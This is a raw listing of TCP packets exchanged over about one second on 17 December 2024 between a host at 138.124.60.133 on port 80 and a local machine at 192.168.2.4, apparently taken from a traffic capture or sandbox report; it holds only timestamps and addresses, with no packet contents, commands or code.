                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.575192928 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.575232029 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.576669931 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.576719999 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.576752901 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.576795101 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.578160048 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.578211069 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.578310966 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.578361034 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.579704046 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.579762936 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.579797983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.579840899 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.581255913 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.581310034 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.581338882 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.581383944 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.582880020 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.582936049 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.582938910 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.582973003 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.639483929 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.639506102 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.639616966 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.640255928 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.640335083 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.640408039 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.640453100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.641712904 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.641778946 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.641804934 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.641864061 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.643261909 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.643326044 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.700545073 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.700654984 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.700669050 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.700699091 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.700856924 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.700902939 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.700917959 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.700948954 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.701811075 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.701877117 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.701879025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.701915026 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.702656031 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.702711105 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.702744007 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.702785969 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.703568935 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.703619003 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.703627110 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.703659058 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.704479933 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.704541922 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.704550028 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.704571962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.705355883 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.705411911 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.705466032 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.705504894 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.706415892 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.706430912 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.706466913 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.707113028 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.707159996 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.707264900 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.707302094 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.708004951 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.708050966 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.708095074 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.708128929 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.708885908 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.708931923 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.709026098 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.709067106 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.709758043 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.709809065 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.709871054 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.709908962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.710697889 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.710762024 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.710798979 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.710834980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.711568117 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.711616039 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.711677074 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.711711884 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.712435007 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.712485075 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.712516069 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.712554932 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.713321924 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.713367939 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.713398933 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.713432074 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.714256048 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.714302063 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.714343071 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.714380026 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.715178967 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.715229034 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.715240955 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.715270996 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.716005087 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.716048956 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.716075897 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.716111898 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.716911077 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.716923952 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.716953993 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.717833996 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.717847109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.717888117 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.717905998 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.718664885 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.718689919 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.718709946 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.718722105 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.719552040 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.719599962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.719631910 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.719661951 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.720422029 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.720464945 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.720515966 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.720546961 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.721286058 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.721333981 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.721400023 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.721436024 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.722297907 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.722342014 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.722419024 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.722457886 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.723084927 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.723124981 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.723184109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.723221064 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.723997116 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.724041939 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.724072933 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.724104881 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.724875927 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.724920034 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.725024939 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.725063086 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.725775957 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.725817919 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.725961924 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.726006031 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.726636887 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.726681948 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.726727962 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.726768017 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.727550983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.727602005 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.727634907 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.727669001 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.728416920 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.728481054 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.728518009 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.728568077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.729293108 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.729355097 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.729434967 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.729471922 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.730195045 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.730245113 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.730303049 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.730437040 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.731080055 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.731128931 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.731164932 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.731201887 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.731971979 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.732022047 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.732095003 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.732131004 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.732846022 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.732893944 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.732928991 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.732965946 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.733843088 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.733891010 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.733917952 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.733951092 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.734684944 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.734733105 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.734869003 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.734910011 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.735543013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.735585928 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.735707998 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.735749006 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.736490965 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.736510992 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.736534119 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.736552000 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.737371922 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.737422943 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.737423897 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.737454891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.738197088 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.738240957 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.738326073 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.738362074 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.739090919 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.739147902 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.739162922 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.739196062 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.739944935 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.740025997 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.740096092 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.740137100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.740865946 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.740916967 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.740987062 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.741022110 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.741755962 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.741801977 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.741835117 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.741873980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.742671013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.742705107 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.742733955 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.742753029 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.743522882 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.743581057 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.743621111 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.743659019 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.831425905 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.831506014 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.831507921 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.831542969 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.831801891 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.831844091 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.831868887 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.831912994 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.832808018 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.832879066 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.832880020 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.832910061 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.833590984 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.833647013 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.892766953 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.892795086 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.892837048 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.892878056 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.892889977 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.892930984 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.893004894 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.893039942 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.893780947 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.893834114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.893841028 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.893881083 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.894629002 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.894680023 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.894768000 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.894814968 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.895593882 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.895653009 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.895692110 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.895731926 CET4973880192.168.2.4138.124.60.133
